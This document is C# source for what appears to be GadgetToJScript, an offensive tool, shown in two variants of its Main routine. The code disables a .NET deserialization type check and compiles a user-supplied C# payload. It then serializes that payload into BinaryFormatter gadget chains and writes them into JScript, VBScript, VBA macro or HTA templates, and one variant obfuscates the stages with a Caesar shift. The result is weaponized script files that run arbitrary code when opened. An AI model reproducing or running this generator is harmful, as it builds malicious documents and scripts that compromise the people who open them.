static void Main()
{
string source;
string template;
using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("SourceCode"))
{
using (StreamReader sr = new StreamReader(stream))
{
source = sr.ReadToEnd();
}
}
using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Template"))
{
using (StreamReader sr = new StreamReader(stream))
{
template = sr.ReadToEnd();
}
}
ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
DisableTypeCheckGadgetGenerator dtcgg = new DisableTypeCheckGadgetGenerator();
MemoryStream stageOne = dtcgg.generateGadget(new MemoryStream());
template = template.Replace("%STAGE_1%", CaesarShift(Convert.ToBase64String(stageOne.ToArray()), 12));
template = template.Replace("%SIZE_OF_STAGE_1%", stageOne.Length.ToString());
Assembly assembly = InternalCompiler.compile(source);
BinaryFormatter bf = new BinaryFormatter();
MemoryStream stageTwo = new MemoryStream();
SurrogateGadgetGenerator sgg = new SurrogateGadgetGenerator(assembly);
bf.Serialize(stageTwo, sgg);
template = template.Replace("%STAGE_2%", CaesarShift(Convert.ToBase64String(stageTwo.ToArray()), 12));
template = template.Replace("%SIZE_OF_STAGE_2%", stageTwo.Length.ToString());
File.WriteAllText(Path.Combine(Directory.GetCurrentDirectory(), Process.GetCurrentProcess().ProcessName + ".js"), template);
}
static void Main(string[] args)
{
var show_help = false;
OptionSet options = new OptionSet()
{
{ "i|input=", "Input file, example: C:\\Users\\userX\\Desktop\\payload.cs", v => _inputFName = v },
{ "r|references=", "Reference Assemblies, example: System.dll,System.IO.Compression.dll", v => _references = v },
{ "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
{ "e|encodeType=", "VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc = v },
{ "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
{ "f|regfree", "Registration-free activation of .NET based COM components", v => _regFree = v != null },
{ "h|?|help", "Show Help", v => show_help = v != null },
};
try
{
options.Parse(args);
if (show_help)
{
ShowHelp(options);
return;
}
if (_wsh == "" || _outputFName == "" || _inputFName == "")
{
ShowHelp(options);
return;
}
if (!Enum.IsDefined(typeof(EWSH), _wsh))
{
ShowHelp(options);
return;
}
if (!Enum.IsDefined(typeof(ENC), _enc))
{
ShowHelp(options);
return;
}
}
catch (Exception e)
{
Console.Error.WriteLine(e.Message);
ShowHelp(options);
return;
}
string resourceName = "";
switch (_wsh)
{
case "js":
if (_regFree)
{
resourceName = "GadgetToJScript.templates.jscript-regfree.template";
}
else
{
resourceName = "GadgetToJScript.templates.jscript.template";
}
break;
case "vbs":
resourceName = "GadgetToJScript.templates.vbscript.template";
break;
case "vba":
if (_enc == "b64")
{
resourceName = "GadgetToJScript.templates.vbascriptb64.template";
}
else
{
resourceName = "GadgetToJScript.templates.vbascripthex.template";
}
break;
case "hta":
resourceName = "GadgetToJScript.templates.htascript.template";
break;
default:
if (_regFree)
{
resourceName = "GadgetToJScript.templates.jscript-regfree.template";
}
else
{
resourceName = "GadgetToJScript.templates.jscript.template";
}
break;
}
MemoryStream _msStg1 = new MemoryStream();
DisableTypeCheckGadgetGenerator _disableTypCheckObj = new DisableTypeCheckGadgetGenerator();
_msStg1 = _disableTypCheckObj.GenerateGadget(_msStg1);
ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
Assembly testAssembly = AssemblyLoader.Compile(_inputFName, _references);
BinaryFormatter _formatterStg2 = new BinaryFormatter();
MemoryStream _msStg2 = new MemoryStream();
ASurrogateGadgetGenerator _gadgetStg = new ASurrogateGadgetGenerator(testAssembly);
_formatterStg2.Serialize(_msStg2, _gadgetStg);
Assembly assembly = Assembly.GetExecutingAssembly();
string _wshTemplate = "";
using (Stream stream = assembly.GetManifestResourceStream(resourceName))
{
if (_wsh != "vba")
{
using (StreamReader reader = new StreamReader(stream))
{
_wshTemplate = reader.ReadToEnd();
_wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
_wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
_wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
_wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
}
}
else
{
List <string> stage1Lines = new List <String>();
List <string> stage2Lines = new List <String>();
if (_enc == "b64")
{
stage1Lines = SplitToLines(Convert.ToBase64String(_msStg1.ToArray()), 100).ToList();
stage2Lines = SplitToLines(Convert.ToBase64String(_msStg2.ToArray()), 100).ToList();
}
else
{
stage1Lines = SplitToLines(BitConverter.ToString(_msStg1.ToArray()).Replace("-", ""), 100).ToList();
stage2Lines = SplitToLines(BitConverter.ToString(_msStg2.ToArray()).Replace("-", ""), 100).ToList();
}
StringBuilder _b1 = new StringBuilder();
_b1.Append("stage_1 = \"").Append(stage1Lines[0]).Append("\"");
_b1.AppendLine();
stage1Lines.RemoveAt(0);
foreach (String line in stage1Lines)
{
_b1.Append("stage_1 = stage_1 & \"").Append(line.ToString().Trim()).Append("\"");
_b1.AppendLine();
}
StringBuilder _b2 = new StringBuilder();
_b2.Append("stage_2 = \"").Append(stage2Lines[0]).Append("\"");
_b2.AppendLine();
stage2Lines.RemoveAt(0);
foreach (String line in stage2Lines)
{
_b2.Append("stage_2 = stage_2 & \"").Append(line.ToString().Trim()).Append("\"");
_b2.AppendLine();
}
using (StreamReader reader = new StreamReader(stream))
{
_wshTemplate = reader.ReadToEnd();
_wshTemplate = _wshTemplate.Replace("%_STAGE1_%", _b1.ToString());
_wshTemplate = _wshTemplate.Replace("%_STAGE2_%", _b2.ToString());
}
}
}
using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
{
_generatedWSH.WriteLine(_wshTemplate);
}
}
